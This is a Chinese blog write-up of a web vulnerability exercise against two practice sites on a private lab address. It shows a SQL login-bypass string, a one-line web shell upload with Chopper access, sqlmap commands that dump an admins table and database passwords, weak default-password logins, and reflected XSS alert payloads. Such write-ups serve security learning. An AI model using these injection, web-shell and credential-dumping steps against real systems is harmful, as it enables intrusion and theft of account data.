记一次漏洞挖掘


题目一:PHP网页

0x01 SQl注入

OWASP扫描,爆出sql注入漏洞

利用爆出的万能钥匙(ZAP' OR '1'='1' -- )进行登录

登录成功

0x02 文件上传

第一步登录成功后,发现疑似上传点

直接上传一句话木马

上传成功

菜刀连接

getshell,就可以干坏事拉

0x03 SQL注入

在登录界面查询处发现疑似sql注入处

抓包发现变量名

sqlmap一键注入

1.查询数据库
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --dbs

2.查询grade数据库中表名
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --tables -D grade

3.查询grade库中admins表中的字段
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --columns -T admins -D grade

4.查询grade库中admins表中的字段id,name,pass
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --dump -C "id,name,pass" -T admins -D grade

5.爆破phpmyadmin后台密码
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --users --password

直接登录后台 账号:root 密码:123456

登录成功

0X04 XSS

反射型Xss <全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。>

OWASP ZAP扫描发现XSS

输入<script>alert(/Two groups the strongest/)</script>

成功弹框

题目二:JS网页

0x01 后台

百度搜索JSPGOU框架得到后台地址

访问后台地址

尝试弱口令登录 账号:admin 密码:123456

登录成功

0x02 XSS

输入<script>alert(/Two groups the strongest/)</script>

成功弹窗

0x03 文件上传

在后台发现上传点,可直接上传文件

参考:
http://www.dengtar.com/5148.html
https://www.codercto.com/a/63186.html


文章作者: 简简
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 简简 !
评论
填上邮箱会收到评论回复提醒哦!!!
 上一篇
攻防世界-Crypto-进阶 攻防世界-Crypto-进阶
你猜猜题目信息下载附件得到haha.txt,504B0304很明显是Zip的文件头HxD新建文件,将haha.txt中的数据copy进去,命名为1.zip解压1.zip,发现需要解压密码,直接暴力破解得到密码为123456解压后得到flag
2019-07-15
下一篇 
MySQL-学习笔记 MySQL-学习笔记
MySQL安装Win mysql安装:Windows下安装MySQL详细教程 - m1racle - 博客园 (cnblogs.com) Mac mysql安装:在MAC上安装mysql_码农伍的博客-CSDN博客_mac安装mysql 库
2019-07-10
  目录